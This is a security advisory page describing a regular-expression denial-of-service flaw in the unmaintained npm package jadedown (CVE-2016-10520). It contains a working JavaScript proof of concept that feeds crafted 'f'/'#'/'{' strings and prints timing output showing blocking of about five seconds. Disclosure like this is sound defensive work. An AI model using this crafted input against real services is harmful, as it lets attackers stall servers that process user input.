Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYzNTQtNm1odi1tdnY1
Regular Expression Denial of Service in jadedown
The jadedown
package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.
Proof of concept
var jadedown = require('jadedown');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = genstr(i, 'f') + genstr(i, '#') + '{';
console.log("LENGTH: " + str.length);
var start = process.hrtime();
jadedown(str)
var end = process.hrtime(start);
console.log(end);
}
Results demonstrating blocking for 5 seconds using only 48 characters.
$ node jadedown.js
COUNT: 1
LENGTH: 6
[ 0, 4014065 ]
COUNT: 4
LENGTH: 12
[ 0, 503507 ]
COUNT: 7
LENGTH: 18
[ 0, 325225 ]
COUNT: 10
LENGTH: 24
[ 0, 1632684 ]
COUNT: 13
LENGTH: 30
[ 0, 7541230 ]
COUNT: 16
LENGTH: 36
[ 0, 80889495 ]
COUNT: 19
LENGTH: 42
[ 0, 636009936 ]
COUNT: 22
LENGTH: 48
[ 5, 820586760 ]
Timeline
- October 24, 2015 - Vulnerability Identified
- October 24, 2015 - Maintainers Notified
- October 25, 2015 - Response from Maintainers with intent to fix
- January 5, 2016 - Advisory Published
- January 11, 2016 - CVE Requested
Recommendation
This package is not actively maintained, and has not seen an update since 2011.
The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.
Permalink: https://github.com/advisories/GHSA-6354-6mhv-mvv5JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTYzNTQtNm1odi1tdnY1
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: about 5 years ago
Updated: 8 months ago
Identifiers: GHSA-6354-6mhv-mvv5, CVE-2016-10520
References:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10520
- https://github.com/advisories/GHSA-6354-6mhv-mvv5
- https://www.npmjs.com/advisories/52
Affected Packages
npm:jadedown
Dependent packages: 1Dependent repositories: 2
Downloads: 6 last month
Affected Version Ranges: <= 0.0.3
No known fixed version
All affected versions: 0.0.1, 0.0.2, 0.0.3